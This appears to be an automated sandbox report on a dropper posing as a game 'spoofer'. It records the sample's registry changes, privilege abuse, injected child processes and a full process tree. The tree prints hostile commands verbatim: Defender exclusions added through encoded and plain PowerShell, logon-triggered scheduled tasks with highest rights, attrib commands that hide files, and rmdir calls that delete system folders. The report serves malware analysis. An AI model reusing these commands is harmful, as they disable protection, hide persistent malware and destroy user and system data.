Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000045c0dde48c11474f81d9a2c02be4ea220000000002000000000010660000000100002000000024f93612a8bbd01c6d6de89914e9ee70dcd22d0590e5dee210490dee241f9fd4000000000e80000000020000200000005452129c1751afbdba976e255694f9ce6e3aac94f03ba582c41164b837ee9dce20000000483f9cf61991c83d78750199b85011058dadcdba89df1658bed35d00f7effaf7400000003c7f0967a9a186c8bda32e3ee1360a6bc51da76b39113a4d678e3c9d138f68d8568e4158ad445f2d5370e292b889916aa706a2764b61f63260be879b43c01260	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FC459871-A1C7-11EF-9A8E-4A174794FC88} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000045c0dde48c11474f81d9a2c02be4ea22000000000200000000001066000000010000200000001578a6734e287aedff50250f04c74feb7bbffe9ebf27518c421edbb6ab426cb0000000000e800000000200002000000042c8b2735305674010120e558e260a7b4dfd3ce459e12654ff06c63532b5a49390000000496f24f9156e82770be513ac8a8b37fba6a129a2d1cea9a47e8dd7be04302edaff2dca2c2455a0754ef67bf9be3a8830e26c9279939f7a261ee1223bd9a95c802403c7a2ebc45e1b9a2b2cb2a19aa72c58b681b4b282594a7d5a6c5c7e45038b736b49baebe68281b0e4811179d2da14deb85b4e2f30336966f369126473f093bac5b6e7524f2e6569f7be7c475704ab40000000c6fc9006353e30480cb1b46bf1737ff36596267c0231e99b2fbc79f426043aa4879d2d2a218389718964497488387ca0b02a6518200487a57e7074067d40b057	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50de16e2d435db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe

Modifies registry class 23 IoCs

Processes:

NXT Cleaner.exereg.exereg.exeCleaner.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864\shell	NXT Cleaner.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\ClsidStore = 024205888547587445419206175140177119313262202375124829	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864\ = "URL:Run game 812970075899428864 protocol"	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864\DefaultIcon	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864\shell\open\command	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NXT Cleaner.exe"	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Installer\Dependencies	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Installer\Dependencies\MSICache = 5863fac0b9225ef24e1f71db725cfdaae1b739511abe49f208c4	Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Installer\Dependencies
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NXT Cleaner.exe"	NXT Cleaner.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Installer\Dependencies\MSICache = 2419820156179824854125581276431683762619058574824047	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Installer\Dependencies	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Installer\Dependencies\MSICache = 024208196332262231508107342454482523161230562007223603	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Installer\Dependencies\MSICache = 02430336571639584481494473472091225723140561819314
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864\URL Protocol	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Installer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\ClsidStore = 243033657163958448149447347209122572314056181931426151
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\discord-812970075899428864\shell\open	NXT Cleaner.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\ClsidStore = 241959408167027912243883728570105532546118962419524697	reg.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
3020	reg.exe
1764	reg.exe
1088
1376
484
2056	reg.exe
448	reg.exe
2108	reg.exe
1448
2632
3004
2532	reg.exe
2504	reg.exe
2688
572	reg.exe
2472	reg.exe
2608	reg.exe
208	reg.exe
220	reg.exe
2532
1304
2548	reg.exe
2188	reg.exe
2356	reg.exe
2668	reg.exe
396	reg.exe
2300
2100
2284	reg.exe
1416	reg.exe
2664	reg.exe
2880	reg.exe
3004	reg.exe
2300
2964	reg.exe
2316
1996	reg.exe
1292	reg.exe
2576	reg.exe
2440	reg.exe
2092	reg.exe
2692	reg.exe
1164	reg.exe
2536	reg.exe
1588
2292
2880	reg.exe
1752	reg.exe
556
2784	reg.exe
2168	reg.exe
2880	reg.exe
1320	reg.exe
3052	reg.exe
1320
2112
3004	reg.exe
396	reg.exe
1536	reg.exe
1624	reg.exe
2076	reg.exe
2436	reg.exe
2168	reg.exe
2720	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

1496 schtasks.exe
1204 schtasks.exe
1228
2076
2104
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Network.exe

pid process

2912 Network.exe

pid	process
1496	schtasks.exe
1204	schtasks.exe
1228
2076
2104

pid	process
2912	Network.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

powershell.exepowershell.exeNetworkEX.exeNetwork Experience.exeNEX.exeNetworkEX.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeNetwork.exeiexplore.exe

pid	process
2496	powershell.exe
3044	powershell.exe
2716	NetworkEX.exe
2900	Network Experience.exe
2900	Network Experience.exe
2900	Network Experience.exe
2716	NetworkEX.exe
2716	NetworkEX.exe
2716	NetworkEX.exe
2716	NetworkEX.exe
2716	NetworkEX.exe
2676	NEX.exe
2676	NEX.exe
2676	NEX.exe
3064	NetworkEX.exe
3064	NetworkEX.exe
2268	powershell.exe
2584	powershell.exe
448	powershell.exe
2720	powershell.exe
832	powershell.exe
3064	NetworkEX.exe
2204
3064	NetworkEX.exe
2428
3064	NetworkEX.exe
3064	NetworkEX.exe
2912	Network.exe
3064	NetworkEX.exe
2528	iexplore.exe
3064	NetworkEX.exe
3064	NetworkEX.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

NXT Cleaner.exe

pid process

2860 NXT Cleaner.exe

pid	process
2860	NXT Cleaner.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

powershell.exepowershell.exeNetwork.exetaskkill.exeNetworkEX.exeNetwork Experience.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exevssvc.exetaskkill.exetaskkill.exetaskkill.exeNetworkEX.exeNEX.exepowershell.exeCleaner.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	2912	Network.exe
Token: SeDebugPrivilege	1036	taskkill.exe
Token: SeDebugPrivilege	2716	NetworkEX.exe
Token: SeDebugPrivilege	2900	Network Experience.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	2132	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeBackupPrivilege	3024	vssvc.exe
Token: SeRestorePrivilege	3024	vssvc.exe
Token: SeAuditPrivilege	3024	vssvc.exe
Token: SeDebugPrivilege	616	taskkill.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	3064	NetworkEX.exe
Token: SeDebugPrivilege	2676	NEX.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeTakeOwnershipPrivilege	1320	Cleaner.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	2428
Token: SeDebugPrivilege	2204
Token: SeDebugPrivilege	2308
Token: SeDebugPrivilege	2912	Network.exe
Token: SeDebugPrivilege	1816

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

2528 iexplore.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

iexplore.exeIEXPLORE.EXENetworkEX.exeNetwork.exe

pid	process
2528	iexplore.exe
2528	iexplore.exe
1776	IEXPLORE.EXE
1776	IEXPLORE.EXE
3064	NetworkEX.exe
1776	IEXPLORE.EXE
1776	IEXPLORE.EXE
2428
2912	Network.exe
1780
1780
1780
1780

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Proxy's Spoofer V2.exeNetworkEX.exenExOs.exeNXT Cleaner.execmd.exeAccuracyFN Swoofer.exe

description	pid	process	target process
PID 2784 wrote to memory of 2496	2784	Proxy's Spoofer V2.exe	powershell.exe
PID 2784 wrote to memory of 2496	2784	Proxy's Spoofer V2.exe	powershell.exe
PID 2784 wrote to memory of 2496	2784	Proxy's Spoofer V2.exe	powershell.exe
PID 2784 wrote to memory of 2496	2784	Proxy's Spoofer V2.exe	powershell.exe
PID 2784 wrote to memory of 2748	2784	Proxy's Spoofer V2.exe	NetworkEX.exe
PID 2784 wrote to memory of 2748	2784	Proxy's Spoofer V2.exe	NetworkEX.exe
PID 2784 wrote to memory of 2748	2784	Proxy's Spoofer V2.exe	NetworkEX.exe
PID 2784 wrote to memory of 2748	2784	Proxy's Spoofer V2.exe	NetworkEX.exe
PID 2748 wrote to memory of 3044	2748	NetworkEX.exe	conhost.exe
PID 2748 wrote to memory of 3044	2748	NetworkEX.exe	conhost.exe
PID 2748 wrote to memory of 3044	2748	NetworkEX.exe	conhost.exe
PID 2748 wrote to memory of 3044	2748	NetworkEX.exe	conhost.exe
PID 2748 wrote to memory of 2900	2748	NetworkEX.exe	Network Experience.exe
PID 2748 wrote to memory of 2900	2748	NetworkEX.exe	Network Experience.exe
PID 2748 wrote to memory of 2900	2748	NetworkEX.exe	Network Experience.exe
PID 2748 wrote to memory of 2900	2748	NetworkEX.exe	Network Experience.exe
PID 2748 wrote to memory of 2912	2748	NetworkEX.exe	Network.exe
PID 2748 wrote to memory of 2912	2748	NetworkEX.exe	Network.exe
PID 2748 wrote to memory of 2912	2748	NetworkEX.exe	Network.exe
PID 2748 wrote to memory of 2912	2748	NetworkEX.exe	Network.exe
PID 2784 wrote to memory of 2860	2784	Proxy's Spoofer V2.exe	NXT Cleaner.exe
PID 2784 wrote to memory of 2860	2784	Proxy's Spoofer V2.exe	NXT Cleaner.exe
PID 2784 wrote to memory of 2860	2784	Proxy's Spoofer V2.exe	NXT Cleaner.exe
PID 2784 wrote to memory of 2860	2784	Proxy's Spoofer V2.exe	NXT Cleaner.exe
PID 2748 wrote to memory of 2716	2748	NetworkEX.exe	NetworkEX.exe
PID 2748 wrote to memory of 2716	2748	NetworkEX.exe	NetworkEX.exe
PID 2748 wrote to memory of 2716	2748	NetworkEX.exe	NetworkEX.exe
PID 2748 wrote to memory of 2716	2748	NetworkEX.exe	NetworkEX.exe
PID 2748 wrote to memory of 2676	2748	NetworkEX.exe	NEX.exe
PID 2748 wrote to memory of 2676	2748	NetworkEX.exe	NEX.exe
PID 2748 wrote to memory of 2676	2748	NetworkEX.exe	NEX.exe
PID 2748 wrote to memory of 2676	2748	NetworkEX.exe	NEX.exe
PID 2784 wrote to memory of 2652	2784	Proxy's Spoofer V2.exe	nExOs.exe
PID 2784 wrote to memory of 2652	2784	Proxy's Spoofer V2.exe	nExOs.exe
PID 2784 wrote to memory of 2652	2784	Proxy's Spoofer V2.exe	nExOs.exe
PID 2784 wrote to memory of 2652	2784	Proxy's Spoofer V2.exe	nExOs.exe
PID 2784 wrote to memory of 2948	2784	Proxy's Spoofer V2.exe	Koks_Cleaner.exe
PID 2784 wrote to memory of 2948	2784	Proxy's Spoofer V2.exe	Koks_Cleaner.exe
PID 2784 wrote to memory of 2948	2784	Proxy's Spoofer V2.exe	Koks_Cleaner.exe
PID 2784 wrote to memory of 2948	2784	Proxy's Spoofer V2.exe	Koks_Cleaner.exe
PID 2784 wrote to memory of 2696	2784	Proxy's Spoofer V2.exe	AccuracyFN Swoofer.exe
PID 2784 wrote to memory of 2696	2784	Proxy's Spoofer V2.exe	AccuracyFN Swoofer.exe
PID 2784 wrote to memory of 2696	2784	Proxy's Spoofer V2.exe	AccuracyFN Swoofer.exe
PID 2784 wrote to memory of 2696	2784	Proxy's Spoofer V2.exe	AccuracyFN Swoofer.exe
PID 2652 wrote to memory of 1068	2652	nExOs.exe	attrib.exe
PID 2652 wrote to memory of 1068	2652	nExOs.exe	attrib.exe
PID 2652 wrote to memory of 1068	2652	nExOs.exe	attrib.exe
PID 2860 wrote to memory of 2172	2860	NXT Cleaner.exe	cmd.exe
PID 2860 wrote to memory of 2172	2860	NXT Cleaner.exe	cmd.exe
PID 2860 wrote to memory of 2172	2860	NXT Cleaner.exe	cmd.exe
PID 1068 wrote to memory of 1036	1068	cmd.exe	taskkill.exe
PID 1068 wrote to memory of 1036	1068	cmd.exe	taskkill.exe
PID 1068 wrote to memory of 1036	1068	cmd.exe	taskkill.exe
PID 2860 wrote to memory of 2700	2860	NXT Cleaner.exe	cmd.exe
PID 2860 wrote to memory of 2700	2860	NXT Cleaner.exe	cmd.exe
PID 2860 wrote to memory of 2700	2860	NXT Cleaner.exe	cmd.exe
PID 2696 wrote to memory of 1764	2696	AccuracyFN Swoofer.exe	cmd.exe
PID 2696 wrote to memory of 1764	2696	AccuracyFN Swoofer.exe	cmd.exe
PID 2696 wrote to memory of 1764	2696	AccuracyFN Swoofer.exe	cmd.exe
PID 2696 wrote to memory of 556	2696	AccuracyFN Swoofer.exe	conhost.exe
PID 2696 wrote to memory of 556	2696	AccuracyFN Swoofer.exe	conhost.exe
PID 2696 wrote to memory of 556	2696	AccuracyFN Swoofer.exe	conhost.exe
PID 2860 wrote to memory of 380	2860	NXT Cleaner.exe	cmd.exe
PID 2860 wrote to memory of 380	2860	NXT Cleaner.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

1068 attrib.exe
2176 attrib.exe

pid	process
1068	attrib.exe
2176	attrib.exe

C:\Users\Admin\AppData\Local\Temp\proxy's woofer\Proxy's Spoofer V2.exe
"C:\Users\Admin\AppData\Local\Temp\proxy's woofer\Proxy's Spoofer V2.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcABiACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Windows\NetworkEX.exe
  "C:\Windows\NetworkEX.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAeAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABoACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3044
- - C:\Users\Admin\AppData\Roaming\Network Experience.exe
    "C:\Users\Admin\AppData\Roaming\Network Experience.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NetworkEX" /tr '"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"' & exit
      4⤵
      PID:1996
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "NetworkEX" /tr '"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1496
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp821B.tmp.bat""
      4⤵
      PID:2688
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2128
    - - C:\Users\Admin\AppData\Roaming\NetworkEX.exe
        
        "C:\Users\Admin\AppData\Roaming\NetworkEX.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3064
- - C:\Windows\Network.exe
    "C:\Windows\Network.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Network.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\NetworkEXP.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NetworkEXP.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:832
- - C:\Users\Admin\NetworkEX.exe
    "C:\Users\Admin\NetworkEX.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NetworkXE" /tr '"C:\Users\Admin\AppData\Roaming\NetworkXE.exe"' & exit
      4⤵
      PID:2888
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "NetworkXE" /tr '"C:\Users\Admin\AppData\Roaming\NetworkXE.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1204
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8334.tmp.bat""
      4⤵
      PID:2984
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1476
- - C:\Users\Admin\AppData\Local\NEX.exe
    "C:\Users\Admin\AppData\Local\NEX.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Temp"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1068
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2176
- C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    - Deletes itself
    PID:2172
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:2700
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    PID:380
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:1932
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:1584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:2388
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:572
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:2160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:1136
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start https://nxt.lol/
    3⤵
    PID:2480
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://nxt.lol/
      4⤵
      Drops desktop.ini file(s)
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
